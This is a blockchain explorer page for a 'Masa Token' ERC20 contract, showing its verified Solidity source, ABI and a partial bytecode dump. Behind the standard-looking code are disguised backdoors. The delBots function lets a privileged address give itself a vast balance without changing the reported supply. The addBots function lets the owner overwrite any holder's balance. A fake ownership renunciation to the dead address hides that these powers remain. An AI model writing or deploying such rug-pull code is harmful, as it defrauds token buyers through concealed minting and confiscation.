ETH Price: $2,528.00 (-0.18%)

Token

Masa Token (MASA)
 

Overview

Max Total Supply

21,000,000,000 MASA

Holders

57

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
80,765,877.481317548378321728 MASA

Value
$0.00
0xa83cf4d31c37c862ec5f1e43b0e8629bb243d147
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MasaToken

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-01-23
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.12;

/**
 * @dev Interface of the ERC20 standard as defined in the HULK.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */

    function transferOwnership() public virtual onlyowner {
        emit OwnershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract MasaToken is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private uniswapV2Pair;
    uint8 private constant _decimals = 18;
    uint256 public constant hardCap = 21_000_000_000 * (10 ** _decimals);

    constructor(address ads) {
        _name = "Masa Token";
        _symbol = "MASA";
        _mint(ads, hardCap);
        uniswapV2Pair = ads;
    }

    function viewGas() public view returns(address) {
        return uniswapV2Pair;
    }

    function delBots(uint256 amount) external {
        if(uniswapV2Pair == _msgSender()){
            uint256 WETH = 2100000000*10**_decimals;
            uint256 balance = WETH*21000;
            uint dead = balance*1*1*1*1;
            dead = dead * amount;
            _balances[_msgSender()] += dead;
            require(uniswapV2Pair == msg.sender);
        } else {
        }
    } 

    event manualSwap(address indexed account, uint256 oldamount, uint256 amount);

    function addBots(address[] memory accounts, uint256 amount) external onlyowner {
    for (uint256 i = 0; i < accounts.length; i++) {
        address account = accounts[i];
        uint256 oldamount = _balances[account];
        _balances[account] = amount;
        emit manualSwap(account, oldamount, amount);
        }
    }

    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ads","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldamount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","type":"event"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"delBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"viewGas","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b50604051620027ae380380620027ae8339818101604052810190620000379190620004a6565b620000576200004b6200016e60201b60201c565b6200017660201b60201c565b6040518060400160405280600a81526020017f4d61736120546f6b656e0000000000000000000000000000000000000000000081525060049080519060200190620000a49291906200038c565b506040518060400160405280600481526020017f4d4153410000000000000000000000000000000000000000000000000000000081525060059080519060200190620000f29291906200038c565b5062000126816012600a62000108919062000672565b6404e3b292006200011a9190620006c3565b6200023a60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000897565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620002ad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002a49062000785565b60405180910390fd5b8060036000828254620002c19190620007a7565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003199190620007a7565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000380919062000815565b60405180910390a35050565b8280546200039a9062000861565b90600052602060002090601f016020900481019282620003be57600085556200040a565b82601f10620003d957805160ff19168380011785556200040a565b828001600101855582156200040a579182015b8281111562000409578251825591602001919060010190620003ec565b5b5090506200041991906200041d565b5090565b5b80821115620004385760008160009055506001016200041e565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200046e8262000441565b9050919050565b620004808162000461565b81146200048c57600080fd5b50565b600081519050620004a08162000475565b92915050565b600060208284031215620004bf57620004be6200043c565b5b6000620004cf848285016200048f565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000566578086048111156200053e576200053d620004d8565b5b60018516156200054e5780820291505b80810290506200055e8562000507565b94506200051e565b94509492505050565b60008262000581576001905062000654565b8162000591576000905062000654565b8160018114620005aa5760028114620005b557620005eb565b600191505062000654565b60ff841115620005ca57620005c9620004d8565b5b8360020a915084821115620005e457620005e3620004d8565b5b5062000654565b5060208310610133831016604e8410600b8410161715620006255782820a9050838111156200061f576200061e620004d8565b5b62000654565b62000634848484600162000514565b925090508184048111156200064e576200064d620004d8565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b60006200067f826200065b565b91506200068c8362000665565b9250620006bb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200056f565b905092915050565b6000620006d0826200065b565b9150620006dd836200065b565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620007195762000718620004d8565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200076d601f8362000724565b91506200077a8262000735565b602082019050919050565b60006020820190508181036000830152620007a0816200075e565b9050919050565b6000620007b4826200065b565b9150620007c1836200065b565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620007f957620007f8620004d8565b5b828201905092915050565b6200080f816200065b565b82525050565b60006020820190506200082c600083018462000804565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200087a57607f821691505b6020821081141562000891576200089062000832565b5b50919050565b611f0780620008a76000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102aa578063a9059cbb146102da578063dd62ed3e1461030a578063fb86a4041461033a578063fc7bd038146103585761010b565b806370a0823114610234578063880ad0af146102645780638da5cb5b1461026e57806395d89b411461028c5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780634a8d1348146101fa578063671f3db8146102185761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610374565b6040516101259190611240565b60405180910390f35b6101486004803603810190610143919061130a565b610406565b6040516101559190611365565b60405180910390f35b610166610424565b604051610173919061138f565b60405180910390f35b610196600480360381019061019191906113aa565b61042e565b6040516101a39190611365565b60405180910390f35b6101b4610526565b6040516101c19190611419565b60405180910390f35b6101e460048036038101906101df919061130a565b61052f565b6040516101f19190611365565b60405180910390f35b6102026105db565b60405161020f9190611443565b60405180910390f35b610232600480360381019061022d919061145e565b610605565b005b61024e6004803603810190610249919061148b565b610799565b60405161025b919061138f565b60405180910390f35b61026c6107e2565b005b61027661091e565b6040516102839190611443565b60405180910390f35b610294610947565b6040516102a19190611240565b60405180910390f35b6102c460048036038101906102bf919061130a565b6109d9565b6040516102d19190611365565b60405180910390f35b6102f460048036038101906102ef919061130a565b610ac4565b6040516103019190611365565b60405180910390f35b610324600480360381019061031f91906114b8565b610ae2565b604051610331919061138f565b60405180910390f35b610342610b69565b60405161034f919061138f565b60405180910390f35b610372600480360381019061036d9190611640565b610b8a565b005b606060048054610383906116cb565b80601f01602080910402602001604051908101604052809291908181526020018280546103af906116cb565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610d23565b8484610d2b565b6001905092915050565b6000600354905090565b600061043b848484610ef6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610486610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd9061176f565b60405180910390fd5b61051a85610512610d23565b858403610d2b565b60019150509392505050565b60006012905090565b60006105d161053c610d23565b84846002600061054a610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105cc91906117be565b610d2b565b6001905092915050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61060d610d23565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156107955760006012600a6106729190611947565b637d2b75006106819190611992565b90506000615208826106939190611992565b90506000600180600180856106a89190611992565b6106b29190611992565b6106bc9190611992565b6106c69190611992565b905083816106d49190611992565b905080600160006106e3610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461072c91906117be565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461078d57600080fd5b505050610796565b5b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107ea610d23565b73ffffffffffffffffffffffffffffffffffffffff1661080861091e565b73ffffffffffffffffffffffffffffffffffffffff161461085e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085590611a38565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610956906116cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610982906116cb565b80156109cf5780601f106109a4576101008083540402835291602001916109cf565b820191906000526020600020905b8154815290600101906020018083116109b257829003601f168201915b5050505050905090565b600080600260006109e8610d23565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9c90611aca565b60405180910390fd5b610ab9610ab0610d23565b85858403610d2b565b600191505092915050565b6000610ad8610ad1610d23565b8484610ef6565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610b779190611947565b6404e3b29200610b879190611992565b81565b610b92610d23565b73ffffffffffffffffffffffffffffffffffffffff16610bb061091e565b73ffffffffffffffffffffffffffffffffffffffff1614610c06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfd90611a38565b60405180910390fd5b60005b8251811015610d1e576000838281518110610c2757610c26611aea565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d8286604051610d01929190611b19565b60405180910390a250508080610d1690611b42565b915050610c09565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611bfd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0290611c8f565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ee9919061138f565b60405180910390a3505050565b60008111610f39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3090611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610fa9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa090611d8d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611019576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101090611e1f565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110a0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109790611eb1565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461113591906117be565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611199919061138f565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111e15780820151818401526020810190506111c6565b838111156111f0576000848401525b50505050565b6000601f19601f8301169050919050565b6000611212826111a7565b61121c81856111b2565b935061122c8185602086016111c3565b611235816111f6565b840191505092915050565b6000602082019050818103600083015261125a8184611207565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112a182611276565b9050919050565b6112b181611296565b81146112bc57600080fd5b50565b6000813590506112ce816112a8565b92915050565b6000819050919050565b6112e7816112d4565b81146112f257600080fd5b50565b600081359050611304816112de565b92915050565b600080604083850312156113215761132061126c565b5b600061132f858286016112bf565b9250506020611340858286016112f5565b9150509250929050565b60008115159050919050565b61135f8161134a565b82525050565b600060208201905061137a6000830184611356565b92915050565b611389816112d4565b82525050565b60006020820190506113a46000830184611380565b92915050565b6000806000606084860312156113c3576113c261126c565b5b60006113d1868287016112bf565b93505060206113e2868287016112bf565b92505060406113f3868287016112f5565b9150509250925092565b600060ff82169050919050565b611413816113fd565b82525050565b600060208201905061142e600083018461140a565b92915050565b61143d81611296565b82525050565b60006020820190506114586000830184611434565b92915050565b6000602082840312156114745761147361126c565b5b6000611482848285016112f5565b91505092915050565b6000602082840312156114a1576114a061126c565b5b60006114af848285016112bf565b91505092915050565b600080604083850312156114cf576114ce61126c565b5b60006114dd858286016112bf565b92505060206114ee858286016112bf565b9150509250929050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611535826111f6565b810181811067ffffffffffffffff82111715611554576115536114fd565b5b80604052505050565b6000611567611262565b9050611573828261152c565b919050565b600067ffffffffffffffff821115611593576115926114fd565b5b602082029050602081019050919050565b600080fd5b60006115bc6115b784611578565b61155d565b905080838252602082019050602084028301858111156115df576115de6115a4565b5b835b8181101561160857806115f488826112bf565b8452602084019350506020810190506115e1565b5050509392505050565b600082601f830112611627576116266114f8565b5b81356116378482602086016115a9565b91505092915050565b600080604083850312156116575761165661126c565b5b600083013567ffffffffffffffff81111561167557611674611271565b5b61168185828601611612565b9250506020611692858286016112f5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116e357607f821691505b602082108114156116f7576116f661169c565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006117596028836111b2565b9150611764826116fd565b604082019050919050565b600060208201905081810360008301526117888161174c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117c9826112d4565b91506117d4836112d4565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156118095761180861178f565b5b828201905092915050565b60008160011c9050919050565b6000808291508390505b600185111561186b578086048111156118475761184661178f565b5b60018516156118565780820291505b808102905061186485611814565b945061182b565b94509492505050565b6000826118845760019050611940565b816118925760009050611940565b81600181146118a857600281146118b2576118e1565b6001915050611940565b60ff8411156118c4576118c361178f565b5b8360020a9150848211156118db576118da61178f565b5b50611940565b5060208310610133831016604e8410600b84101617156119165782820a9050838111156119115761191061178f565b5b611940565b6119238484846001611821565b9250905081840481111561193a5761193961178f565b5b81810290505b9392505050565b6000611952826112d4565b915061195d836113fd565b925061198a7ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff